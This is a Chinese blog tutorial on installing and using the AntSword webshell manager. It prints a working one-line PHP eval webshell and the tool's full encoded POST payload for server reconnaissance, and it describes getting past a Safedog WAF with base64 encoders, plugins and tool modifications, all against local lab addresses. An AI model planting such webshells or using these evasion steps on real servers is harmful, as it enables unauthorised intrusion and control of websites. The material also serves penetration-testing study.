中国蚁剑安装使用教程
中国蚁剑安装使用教程
- 前言
- 一、中国蚁剑安装
- 二、中国蚁剑使用
- 2.1中国蚁剑连接木马
- 2.2中国蚁剑设置代理
- 2.3中国蚁剑参数设置
- 2.4中国蚁剑其他使用
- 三、 中国蚁剑绕过Waf
- 3.1 编码绕过WAF
- 3.2插件绕过waf
- 3.3 修改蚁剑绕过WAF
- 总结
大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起
前言
中国蚁剑是一款开源的跨平台网站管理工具
,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
一、中国蚁剑安装
中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it
中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用
二、中国蚁剑使用
2.1中国蚁剑连接木马
我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:
<?php @eval($_POST['1']); ?>
类容是一句话木马,连接密码是1.
- 右键点击添加数据
- url填写http://192.168.93.129/muma.php
如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:
2.2中国蚁剑设置代理
- 首先点击设置
- 进行相应的配置
配置正确点击测试连接就可以进行抓包
点击正上方的测试连接
2.3中国蚁剑参数设置
如下所示,是http包的相应的参数
POST /muma.php HTTP/1.1
Host: 192.168.93.129:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:
在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:
2.4中国蚁剑其他使用
三、 中国蚁剑绕过Waf
3.1 编码绕过WAF
设置不同的编码器和解码器可以绕过waf,如下所示:
我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:
<?php @eval($_POST['1']); ?>
类容是一句话木马,连接密码是1.
- 右键点击添加数据
- url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)
开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:
- 开启安全狗
基本上开启了waf,你就很难进行连接了,触发waf版本很老
3.2插件绕过waf
如上所示,点击插件市场,进行插件下载
由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试
3.3 修改蚁剑绕过WAF
如下文章,是比较好的绕过waf的手段
蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)
总结
如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF
中国蚁剑安装使用教程相关推荐
- 【网络安全】文件上传漏洞及中国蚁剑安装
文件上传漏洞 描述 中国蚁剑安装 1. 官网下载源码和加载器 2.解压至同一目录并 3.安装 4.可能会出现的错误 文件上传过程 必要条件 代码示例 dvwa靶场攻击示例 1.书写一句话密码进行上传 ...
- 【蚁剑工具-01】网站管理工具之中国蚁剑安装过程详解以及应用实例
目录 1 中国蚁剑安装及设置 1.1 下载 1.2 安装 1.3 相关设置 2 中国蚁剑应用实例 2.1 操作环境 2.2 具体步骤 3 总结 参考文章 任何人不得将其用于非法用途以及盈利等目的,也禁 ...
- 中国蚁剑下载、安装、使用教程
文章目录 中国蚁剑下载.安装.使用教程 一.中国蚁剑下载 二.中国蚁剑安装 三.中国蚁剑使用 1.添加一个shell 2.插件 3.关于编码器 4.user-agent修改 中国蚁剑下载.安装.使用教 ...
- 中国蚁剑(antSword)下载、安装、安装出现的问题、使用教程
前言: 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件. 中国蚁剑推崇模块化 ...
- 中国蚁剑(win32-x64)——安装报错:解压代码出错:[object Object]
参考文章 中国蚁剑安装步骤(win10 64) 报错:解压代码出错:[object Object]
- 中国蚁剑AntSword
中国蚁剑AntSword 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. 参考文档 中国蚁剑下载.安装.使用教程_Sumarua的博客-C ...
- 我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它
目录 一.中国蚁剑下载 二.中国蚁剑安装 第一步:解压后,打开加载器antsword-Loder文件,并运行AntSword.exe程序 第二步:再次打开AntSword.exe,就能再次运行了 三. ...
- 中国蚁剑下载安装以及插件的安装教程
一,中国蚁剑下载 唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...
- 中国蚁剑的下载以及安装教程
一,中国蚁剑下载 唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...
最新文章
- ArcGIS_系列中文教程下载
- 22.6. Query 查询
- resin3.1+apache2.2.8 整合(笔记)
- SD-WAN的体系结构是如何提高网络灵活性和效率?
- GraphPad Prism 平均值的标准误差
- OpenCV相交凸intersectConvex的实例(附完整代码)
- MySQL优化:数据量很大,分页查询很慢,有什么优化方案?
- SDL_main导致main找不到入口
- 如何清理 Weblogic Server 缓存
- 【Servlet】过滤器技术
- 【Python】Python3.7.3 - 闭包Closure技术
- 吴陆 java,成年人的世界,崩溃无声。
- cx_Oracle库导入失败引起crontab中python程序运行失败,并且无错误提示
- 26--学生签到 管理员页面功能(5) foreach
- 网站服务器需不需要装杀毒软件,服务器要不要装杀毒软件
- 关于microsoft html help workshop的一些草蛋问题
- 如何使用OpenCV-Python-dlib实现有关闭眼的检测、眨眼次数的计算?(附源码,绝对可用)
- window 删除文件报错显示被程序占用 强制删除被占用的文件
- 云原生计算动态周报2.13-2.20
- 行人重识别(4)——行人重识别(基于视频)综述